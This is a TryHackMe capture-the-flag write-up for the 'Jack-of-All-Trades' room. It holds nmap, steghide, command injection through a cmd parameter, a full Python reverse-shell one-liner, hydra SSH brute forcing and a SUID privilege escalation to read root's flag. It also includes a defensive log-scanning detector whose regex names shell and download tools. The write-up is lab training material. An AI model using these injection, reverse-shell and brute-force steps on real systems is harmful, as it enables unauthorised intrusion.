Jack-of-All-Trades — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Jack-of-All-Trades — TryHackMe — WriteUp. Check it out!

First, deploy the machine and run nmap to find the open ports.

nmap -A -T4 -p- <ip>

[screenshot: nmap scan results]

There is something tricky here. Normally port 22 is SSH and port 80 is HTTP, but on this machine it's the other way round: SSH listens on port 80 and the web server on port 22.

So let's access the website on port 22. Firefox will block the request at first, because 22 is on its list of restricted (non-web) ports. Follow these steps to allow port 22 in Firefox:

1/ Type about:config in your address bar

2/ Right click -> New -> String

3/ Enter this name: network.security.ports.banned.override

4/ Enter 22 as the value and save

You will have the setting like this:

From now on, you can unblock any restricted port by changing this string to the port you want to access.

Now let’s get back to the website.

[screenshot: the website on port 22]

It’s always useful to check the page source. Press Ctrl+U to view page source.

[screenshot: page source]

There are four things to focus on: three images, a hidden path, and an encoded string.

First let's see what's at the hidden path: /recovery.php

[screenshot: /recovery.php login page]

It's a login page. I guess the username is jack and the password is the encoded string from the page source. Let's use icyberchef.com to decode that string.

[screenshot: CyberChef decoding the string]

So it’s encoded with Base64. Now I have the password: u?WtKSraq

I tried to log in with jack and that password, but it didn't work. So let's find another way.

It's time for some stego. Download the three images and look for hidden data.

I will use steghide to extract the hidden data:

steghide extract -sf stego.jpg

Enter the decoded password from above and you will see the hidden data.

I could not extract anything from jackinthebox.jpg with that password, so skip it. Let's see what's inside "creds.txt".

[screenshot: contents of creds.txt]

Uh-oh!! 😣 That means we need to extract the data from another image.

There is only one image left, which is header.jpg.

steghide extract -sf header.jpg

Use the same password again.

[screenshot: steghide extracting from header.jpg]

Read the contents of the extracted file.

[screenshot: contents of cms.creds]

Finally we have the credentials! Let's log in to the /recovery.php page.

[screenshot: logged in to /recovery.php]

It tells us to give it a 'cmd', which means the page runs whatever command we pass it: a command injection.

First let's try ls to list the files inside the home folder. Add ?cmd=ls+/home to the end of the URL.

[screenshot: output of ls /home]

It worked. So let's spawn a reverse shell.

Start a listener on your machine.

nc -lvnp 4444

Change the cmd:

?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_host_ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

*Remember to replace your_host_ip with your own IP address.

Now you have a shell on your machine.

[screenshot: reverse shell received]
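The defender's view of the step above, as an added example that is not part of this write-up: a small Python detector that parses constructed Apache-style access-log lines and flags requests that pass a cmd parameter to /recovery.php, rating a plain recon probe like ls lower than a value that carries shell metacharacters or an interpreter. The log lines, field names and severity labels are my own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines (not from the room); the web
# server listening on port 22 instead of 80 does not change the log format.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /recovery.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /recovery.php?cmd=ls+/home HTTP/1.1" 200 143
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /recovery.php?cmd=python+-c+%27import+socket%27 HTTP/1.1" 200 0
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# Common Log Format: client ident user [timestamp] "METHOD path proto" status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# Shell metacharacters, interpreters or downloaders in the value separate a
# recon probe (ls) from an attempt to spawn a shell or pull a second stage.
SUSPICIOUS = re.compile(r'[;&|`$]|\b(?:python\d?|perl|bash|sh|nc|ncat|wget|curl)\b')
VULN_SCRIPT = "/recovery.php"   # endpoint and parameter name from the write-up
VULN_PARAM = "cmd"

def parse_line(line):
    """Split one log line into fields; parse_qs also decodes %xx and '+'."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["path"])
    rec["script"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec

def classify(rec):
    """benign: no cmd to the script; medium: any cmd; high: shell-like payload."""
    values = rec["params"].get(VULN_PARAM)
    if rec["script"] != VULN_SCRIPT or not values:
        return "benign"
    return "high" if SUSPICIOUS.search(" ".join(values)) else "medium"

def scan(log_text):
    """Return (client_ip, severity, decoded cmd) for every flagged request."""
    findings = []
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        sev = classify(rec)
        if sev != "benign":
            findings.append((rec["ip"], sev, " ".join(rec["params"][VULN_PARAM])))
    return findings
```

On a real server the same logic belongs in a log pipeline keyed on the client IP, so that the ls probe followed by a payload from the same address raises one alert rather than two.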

cd to the home folder and cat the contents of jacks_password_list.

[screenshot: contents of jacks_password_list]

It's a list of candidate passwords for the user jack's SSH login. Let's brute-force it with hydra. Copy the password list into a text file.

hydra -l jack -P jack.txt ssh://<ip>:80

*I named the file jack.txt, so remember to change it to your own file name.

[screenshot: hydra output]

Now I have the valid password. Let's SSH to the machine (remember SSH is on port 80 here).

ssh jack@10.10.182.221 -p 80

Enter the password and we’re in!

[screenshot: SSH session as jack]

Now cd to jack's home and list the files.

[screenshot: listing of jack's home directory]

There is a user.jpg inside, and it will be our first flag. Copy this image to your machine using scp:

scp -P 80 jack@<machine_ip>:/home/jack/user.jpg /your_home_folder

Enter jack's password and the picture will be transferred to your machine.

[screenshot: user.jpg]

Open the image and get your first flag.

[screenshot: first flag]

Now let's get root to read the final flag inside the /root folder.

First try sudo -l to see whether jack can run anything with sudo on this machine.

[screenshot: sudo -l output]

Unfortunately, no! So let's try another way. Use find to search for binaries with the SUID bit set.

find / -perm -u=s 2>/dev/null

[screenshot: find output]

The strings binary is SUID, so it runs with its owner's privileges and we can use it to read /root/root.txt.

First set LFILE=/root/root.txt

Then run:

strings "$LFILE"

[screenshot: strings output]

Now get your final flag!

The end.

HAPPY HACKING

I’m Groot